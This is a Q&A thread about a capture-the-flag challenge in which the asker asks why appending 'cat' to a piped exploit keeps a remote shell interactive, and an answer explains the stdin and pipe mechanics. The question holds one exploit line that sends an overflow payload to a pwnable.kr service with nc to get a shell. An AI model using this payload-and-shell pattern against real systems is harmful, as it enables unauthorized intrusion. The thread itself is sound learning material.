2

I began with playing ctfs challenges, and I encountered a problem where I needed to send an exploit into a binary and then interact with the spawned shell. I found a solution to this problem which looks something like this:

(echo -ne "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000

Meaning: without the "cat" sub-command, I couldn't interact with the shell, but with it, i now able to send commands into the spawned shell and get the returned output to my console stdout.

What exactly happens there? this command line confuses me

John Kugelman
  • 349,597
  • 67
  • 533
  • 578
mikel bubi
  • 123
  • 1
  • 1
  • 7

1 Answers1

2

If you just type in cat at the command line, you'll be able to see that this command simply copies stdin to stdout one line at a time. It will carry on doing this until you either quit with Ctrl-C or send an EOF with Ctrl-D.

In this example you're running cat immediately after successfully printing the payload (the concatenator && tells the shell to run the second command only if the first command has an exit code of zero; i.e., no error). As a result, the remote terminal won't see an EOF until you terminate it as described above. When this is piped to nc, everything you type in is sent via cat to the remote server, and everything it sends back appears on your stdout.

So yes, in effect you end up with an interactive shell. You can get pretty much the same effect on your own machine by running cat | sh.

r3mainer
  • 23,981
  • 3
  • 51
  • 88